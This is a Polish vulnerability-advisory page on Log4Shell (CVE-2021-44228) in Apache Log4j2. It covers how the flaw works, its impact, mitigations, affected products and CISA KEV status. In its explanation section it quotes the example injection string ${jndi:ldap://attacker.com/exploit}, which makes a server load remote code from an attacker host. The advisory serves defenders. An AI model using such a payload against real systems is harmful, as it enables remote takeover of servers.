CRITICAL🚩 CISA KEV⚡ EXPLOIT✓ PATCH🇬🇧 English

CVE-2021-44228

Apache Log4j2 Log4Shell — RCE przez podatną funkcję JNDI lookup

CVSS 10.0v3.1pub. 2021-12-10upd. 2026-08-11

Krytyczna podatność w bibliotece Apache Log4j2 (znana jako Log4Shell) umożliwia zdalnemu, nieuwierzytelnionemu atakującemu wykonanie dowolnego kodu na serwerze poprzez spreparowane dane wejściowe zapisywane w logach. Ze względu na powszechność Log4j2 w aplikacjach Java oraz maksymalny wynik CVSS 10.0 i potwierdzone aktywne wykorzystanie, stanowi jedno z najpoważniejszych zagrożeń w historii bezpieczeństwa aplikacji.

Pokaż oryginał (EN)

Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.

🤖 Analiza AI
Jak działa

Biblioteka Log4j2 w wersjach 2.0-beta9 do 2.15.0 obsługuje mechanizm JNDI lookup (Java Naming and Directory Interface), który pozwala na dynamiczne podstawianie wartości w komunikatach logów. Atakujący może wstrzyknąć do logowanej treści specjalnie spreparowany ciąg znaków, np. ${jndi:ldap://attacker.com/exploit}, który skłoni serwer do nawiązania połączenia z kontrolowanym przez atakującego serwerem LDAP lub innym endpointem JNDI. W odpowiedzi serwer atakującego dostarcza złośliwy obiekt Java, który jest deserializowany i wykonywany w kontekście podatnej aplikacji. Podatność dotyczy wyłącznie modułu log4j-core i nie obejmuje log4net, log4cxx ani innych projektów Apache Logging Services.

Skutki

Atakujący może zdalnie wykonać dowolny kod (RCE) na serwerze bez żadnego uwierzytelnienia, co w praktyce oznacza możliwość przejęcia pełnej kontroli nad systemem, kradzieży danych, instalacji backdoorów lub dalszego lateral movement w sieci.

Mitygacja

Należy pilnie zaktualizować Apache Log4j2 do wersji 2.17.0 lub nowszej (dla Java 8+), 2.12.3 lub nowszej (dla Java 7) albo 2.3.1 lub nowszej (dla Java 6), które całkowicie usuwają podatną funkcjonalność JNDI. Od wersji 2.16.0 obsługa JNDI lookup została całkowicie wyłączona. Jeśli natychmiastowa aktualizacja nie jest możliwa, jako doraźne obejście można ustawić parametr JVM -Dlog4j2.formatMsgNoLookups=true lub usunąć klasę JndiLookup z classpath. W przypadku urządzeń Siemens należy zastosować patche dostępne u producenta zgodnie z referencjami.

Kogo dotyczy

Apache Log4j2 w wersjach od 2.0-beta9 do 2.15.0 (z wyłączeniem poprawionych wydań bezpieczeństwa: 2.12.2, 2.12.3 oraz 2.3.1). W kontekście dostarczonych metadanych dotyczy również firmware urządzeń Siemens o oznaczeniach 6BK1602-0AA12-0TP0, 6BK1602-0AA22-0TP0 oraz 6BK1602-0AA32-0TP0, które zawierają podatną wersję biblioteki.

Uwagi

Podatność została opublikowana 10 grudnia 2021 roku i jest aktywnie exploitowana według rejestru CISA KEV. Dostępne są publiczne exploity (m.in. w bazie Packet Storm Security). Podatność jest specyficzna dla modułu log4j-core i NIE dotyczy log4net, log4cxx ani innych projektów Apache Logging Services.

CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
  • Apache Log4j

    APP
    Apache
    2.02.13.0 – 2.15.0 (bez)2.0.1 – 2.3.1 (bez)2.4.0 – 2.12.2 (bez)
  • Cisco Advanced Malware Protection Virtual Private Cloud Appliance

    APP
    Cisco
    < 3.5.4
  • Cisco Automated Subsea Tuning

    APP
    Cisco
    < 2.1.0
  • Cisco Broadworks

    APP
    Cisco
    < 2021.11_1.162
  • Cisco Business Process Automation

    APP
    Cisco
    3.2.000.000 – 3.2.000.009 (bez)3.1.000.000 – 3.1.000.044 (bez)< 3.0.000.115
  • Cisco Cloudcenter

    APP
    Cisco
    < 4.10.0.16
  • Cisco Cloud Connect

    APP
    Cisco
    < 12.6\(1\)
  • Debian

    OS
    Debian
    10.011.09.0
  • Fedora Project Fedora

    OS
    Fedoraproject
    3435
  • Intel Computer Vision Annotation Tool

    APP
    Intel
    wszystkie wersje
  • Intel Datacenter Manager

    APP
    Intel
    < 5.1
  • Intel Genomics Kernel Library

    APP
    Intel
    wszystkie wersje
  • Intel Oneapi Sample Browser

    APP
    Intel
    wszystkie wersje
  • Intel Secure Device Onboard

    APP
    Intel
    wszystkie wersje
  • Intel System Studio

    APP
    Intel
    wszystkie wersje
  • Netapp Active Iq Unified Manager

    APP
    Netapp
    wszystkie wersje
  • Netapp Brocade San Navigator

    APP
    Netapp
    wszystkie wersje
  • Netapp Cloud Insights

    APP
    Netapp
    wszystkie wersje
  • Netapp Cloud Manager

    APP
    Netapp
    wszystkie wersje
  • Netapp Cloud Secure Agent

    APP
    Netapp
    wszystkie wersje
  • Netapp Oncommand Insight

    APP
    Netapp
    wszystkie wersje
  • Netapp Ontap Tools

    APP
    Netapp
    wszystkie wersje
  • Netapp Snapcenter

    APP
    Netapp
    wszystkie wersje
  • Netapp Solidfire Enterprise Sds

    APP
    Netapp
    wszystkie wersje
  • Netapp Solidfire \& Hci Storage Node

    APP
    Netapp
    wszystkie wersje
  • Siemens 6bk1602 0aa12 0tp0

    HW
    Siemens
    wszystkie wersje
  • Siemens 6bk1602 0aa12 0tp0 Firmware

    OS
    Siemens
    < 2.7.0
  • Siemens 6bk1602 0aa22 0tp0

    HW
    Siemens
    wszystkie wersje
  • Siemens 6bk1602 0aa22 0tp0 Firmware

    OS
    Siemens
    < 2.7.0
  • Siemens 6bk1602 0aa32 0tp0

    HW
    Siemens
    wszystkie wersje

CISA KEV — szczegółyi

Dostawcai
Apache
Produkti
Log4j2
Data dodania do KEVi
10 grudnia 2021
Termin remediation (USA)i
24 grudnia 2021(po terminie)
Ransomwarei
Aktywne kampanie ransomware używają tej podatności
Wymagana akcja (CISA)i

Dla wszystkich dotkniętych zasobów oprogramowania, dla których dostępne są aktualizacje, jedynymi akceptowalnymi działaniami naprawczymi są: 1) Zastosowanie aktualizacji; LUB 2) usunięcie dotkniętych zasobów z sieci agencji. Tymczasowe mitygacje przy użyciu jednego ze środków dostępnych na stronie https://www.cisa.gov/uscert/ed-22-02-apache-log4j-recommended-mitigation-measures są akceptowalne wyłącznie do momentu udostępnienia aktualizacji.

tłumaczenie AI
Pokaż oryginał (EN)

For all affected software assets for which updates exist, the only acceptable remediation actions are: 1) Apply updates; OR 2) remove affected assets from agency networks. Temporary mitigations using one of the measures provided at https://www.cisa.gov/uscert/ed-22-02-apache-log4j-recommended-mitigation-measures are only acceptable until updates are available.

Opis CISAi

Apache Log4j2 zawiera lukę umożliwiającą zdalne wykonanie kodu, ponieważ funkcje JNDI nie chronią przed kontrolowanymi przez atakującego punktami końcowymi związanymi z JNDI.

tłumaczenie AI
Pokaż oryginał (EN)

Apache Log4j2 contains a vulnerability where JNDI features do not protect against attacker-controlled JNDI-related endpoints, allowing for remote code execution.

🔴
NATYCHMIASTOWE DZIAŁANIE
Aktywnie wykorzystywane w atakach (CISA KEV). Załataj jak najszybciej.
☠️WYKORZYSTYWANE W RANSOMWARECISA DEADLINE: 24 grudnia 2021
Tagi
RCEDeserialization
CWE
Referencje

Powiązane podatności

CVE-2026-24061CRITICAL9.8⚠ KEVPL ✓ten sam produkt

GNU Inetutils telnetd: ominięcie uwierzytelnienia przez zmienną USER

CVE-2025-32463CRITICAL9.3⚠ KEVPL ✓ten sam produkt

Sudo: eskalacja uprawnień do root poprzez opcję --chroot (CVE-2025-32463)

CVE-2025-49113CRITICAL9.9⚠ KEVPL ✓ten sam produkt

RCE przez deserializację PHP w Roundcube Webmail (parametr _from)

CVE-2025-32433CRITICAL10.0⚠ KEVPL ✓ten sam produkt

Erlang/OTP SSH — nieuwierzytelniony RCE (CVSS 10.0)

CVE-2025-24201CRITICAL10.0⚠ KEVPL ✓ten sam produkt

Apple WebKit: out-of-bounds write umożliwiający ucieczkę z sandbox przeglądarki